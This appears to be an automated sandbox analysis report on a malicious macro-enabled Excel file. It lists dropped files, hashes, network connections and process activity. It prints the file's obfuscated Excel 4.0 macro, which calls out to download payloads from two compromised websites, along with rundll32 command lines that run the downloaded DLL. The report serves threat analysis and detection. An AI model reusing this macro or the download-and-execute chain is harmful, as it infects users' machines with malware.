                                                                              Preview: L..................F...........7G......%A......%A... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):115
                                                                              Entropy (8bit):4.418133942983911
                                                                              Encrypted:false
                                                                              SSDEEP:3:oyBVomxWdadAdrXVoOytdAdrXVomxWdadAdrXVov:djuadgEtdguadgy
                                                                              MD5:1DD64E34B701C2F1258FA5053DA222D3
                                                                              SHA1:62C41DD710409066BF7DB8B6B73E3711CD135732
                                                                              SHA-256:B8A5C62AFDAEB5DBBDB86B394AB15E3C62E4B1C420BCBDC0A7DEBE97EED271C2
                                                                              SHA-512:405F0C07FFC2906218C49F9E81150ED5A3E53B1A421C3F06FA338AC08571EDAF566A8E1D6DB025E549C8DE4189FD3BC00AA8D43733E9F0587E4AEB7C7A6E836B
                                                                              Malicious:false
                                                                              Preview: Desktop.LNK=0..[misc]..statistic-2070252624.LNK=0..statistic-2070252624.LNK=0..[misc]..statistic-2070252624.LNK=0..
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2070252624.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue May 4 19:40:42 2021, atime=Tue May 4 19:40:42 2021, length=109076, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2138
                                                                              Entropy (8bit):4.539971791446726
                                                                              Encrypted:false
                                                                              SSDEEP:48:85t/XTFGqgthCCF+Qh25t/XTFGqgthCCF+Q/:8H/XJGqgmCF+Qh2H/XJGqgmCF+Q/
                                                                              MD5:5CC74B0F0B3F35451E8E1052D8125BC3
                                                                              SHA1:22D8E30FE1E46EBFD2207F0487282F797455F9FB
                                                                              SHA-256:88F6F3885141B7FAAD9CE2100611BDC9B9A63F0435CE3B89FFE72E308FC3FFBD
                                                                              SHA-512:28D3919C5559D24A67339D85599378CC0D19D38C1CF2331BF3281814532937EBEE2CA73F811EAAFBBB2E141198A792D0B2F3291FD1CD8A9FF2FBA7858151DF5D
                                                                              Malicious:false
                                                                              Preview: L..................F.... ...N....{......%A......%A...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......R.. .STATIS~1.XLS..`.......Q.y.Q.y*...8.....................s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\statistic-2070252624.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.7.0.2.5.2.6.2.4...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347.........
                                                                              C:\Users\user\Desktop\BEDE0000
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):109076
                                                                              Entropy (8bit):7.916953258661507
                                                                              Encrypted:false
                                                                              SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfDe:oeuocrZD2MopH8x+FHdoLqp6vif+zb7e
                                                                              MD5:048F8C82483D1FD10E5E24CC543E6B22
                                                                              SHA1:38CBD864D57048939B41364384E9A142E0821E3F
                                                                              SHA-256:885D44BE1631D584CFFDE9FF5695120101B5E25D92EE690597756ED13BC4E49F
                                                                              SHA-512:DA02BCE68D74515B5CD9069B04512F40B7D0F723F5FD7A0022ED97FB41A4EEFEC2C6C622653AD6A2D2051C0BDBF784A7D801A043113AFA91FBE85875226FF987
                                                                              Malicious:false
                                                                              Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\Desktop\~$statistic-2070252624.xlsm
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):330
                                                                              Entropy (8bit):1.4377382811115937
                                                                              Encrypted:false
                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                              Malicious:true
                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              C:\Users\user\jordji.nbvt11
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:HTML document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):494
                                                                              Entropy (8bit):4.962239405540505
                                                                              Encrypted:false
                                                                              SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                              MD5:0357AA49EA850B11B99D09A2479C321B
                                                                              SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                              SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                              SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                              Malicious:false
                                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                              Static File Info

                                                                              General

                                                                              File type:Microsoft Excel 2007+
                                                                              Entropy (8bit):7.917058358399405
                                                                              TrID:
                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                              File name:statistic-2070252624.xlsm
                                                                              File size:109084
                                                                              MD5:0fbdc8a2acd4dc782821cfa4fdf75099
                                                                              SHA1:e407df0a3a3ceed4c3e9aed5716974a45cd5c542
                                                                              SHA256:abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
                                                                              SHA512:760a54caf1a66d36e8f4e6fc20c8380cb012d7b76d24e5fd91085943da3b31a8471a2093ddc862a7fdf3da4c7ff49459f372033d72d67fef021e8025c3006502
                                                                              SSDEEP:1536:8utuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:8kuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                              File Content Preview:PK..........!.t...............[Content_Types].xml ...(........................................................""...............................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                              Static OLE Info

                                                                              General

                                                                              Document Type:OpenXML
                                                                              Number of OLE Files:1

                                                                              OLE File "statistic-2070252624.xlsm"

                                                                              Indicators

                                                                              Has Summary Info:
                                                                              Application Name:
                                                                              Encrypted Document:
                                                                              Contains Word Document Stream:
                                                                              Contains Workbook/Book Stream:
                                                                              Contains PowerPoint Document Stream:
                                                                              Contains Visio Document Stream:
                                                                              Contains ObjectPool Stream:
                                                                              Flash Objects Count:
                                                                              Contains VBA Macros:

                                                                              Macro 4.0 Code

                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                              ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 4, 2021 13:40:56.011271954 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:56.196114063 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.196310043 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:56.207459927 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:56.392272949 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.400810003 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.400842905 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.400859118 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.401017904 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:56.442159891 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:56.631906986 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:56.632142067 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:58.316885948 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:58.543472052 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:58.863086939 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:58.863257885 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:58.863373995 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:58.863440990 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:58.863814116 CEST49165443192.168.2.22192.254.233.89
                                                                              May 4, 2021 13:40:58.938626051 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.048544884 CEST44349165192.254.233.89192.168.2.22
                                                                              May 4, 2021 13:40:59.100384951 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.100495100 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.101084948 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.262665033 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.275262117 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.275306940 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.275332928 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.275460958 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.319243908 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.522713900 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.548538923 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.548702002 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.579777956 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.743984938 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.757294893 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.757474899 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.757572889 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.757883072 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.758296967 CEST49168443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.761420965 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.919950008 CEST44349168192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.920165062 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:40:59.920239925 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:40:59.921315908 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:00.080068111 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:41:00.080919981 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:41:00.081003904 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:00.081574917 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:00.107045889 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:00.266030073 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:41:00.442528009 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:41:00.443290949 CEST44349169192.185.5.2192.168.2.22
                                                                              May 4, 2021 13:41:00.443346024 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:00.443403006 CEST49169443192.168.2.22192.185.5.2
                                                                              May 4, 2021 13:41:30.443201065 CEST44349169192.185.5.2192.168.2.22

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 4, 2021 13:40:55.939462900 CEST5219753192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:55.997088909 CEST53521978.8.8.8192.168.2.22
                                                                              May 4, 2021 13:40:57.056305885 CEST5309953192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:57.105034113 CEST53530998.8.8.8192.168.2.22
                                                                              May 4, 2021 13:40:57.112351894 CEST5283853192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:57.163876057 CEST53528388.8.8.8192.168.2.22
                                                                              May 4, 2021 13:40:57.711093903 CEST6120053192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:57.769944906 CEST53612008.8.8.8192.168.2.22
                                                                              May 4, 2021 13:40:57.777580023 CEST4954853192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:57.837529898 CEST53495488.8.8.8192.168.2.22
                                                                              May 4, 2021 13:40:58.876420021 CEST5562753192.168.2.228.8.8.8
                                                                              May 4, 2021 13:40:58.934286118 CEST53556278.8.8.8192.168.2.22

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              May 4, 2021 13:40:55.939462900 CEST192.168.2.228.8.8.80xed69Standard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                                              May 4, 2021 13:40:58.876420021 CEST192.168.2.228.8.8.80x4b51Standard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              May 4, 2021 13:40:55.997088909 CEST8.8.8.8192.168.2.220xed69No error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                                              May 4, 2021 13:40:58.934286118 CEST8.8.8.8192.168.2.220x4b51No error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                                              HTTPS Packets

                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                              May 4, 2021 13:40:56.400859118 CEST192.254.233.89443192.168.2.2249165CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                              May 4, 2021 13:40:59.275332928 CEST192.185.5.2443192.168.2.2249168CN=cpcalendars.anaheimdermatologists.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:32 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:32 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:13:40:39
                                                                              Start date:04/05/2021
                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                              Imagebase:0x13fa10000
                                                                              File size:27641504 bytes
                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:13:40:47
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                              Imagebase:0xfff40000
                                                                              File size:45568 bytes
                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:13:40:47
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                              Imagebase:0xfff40000
                                                                              File size:45568 bytes
                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >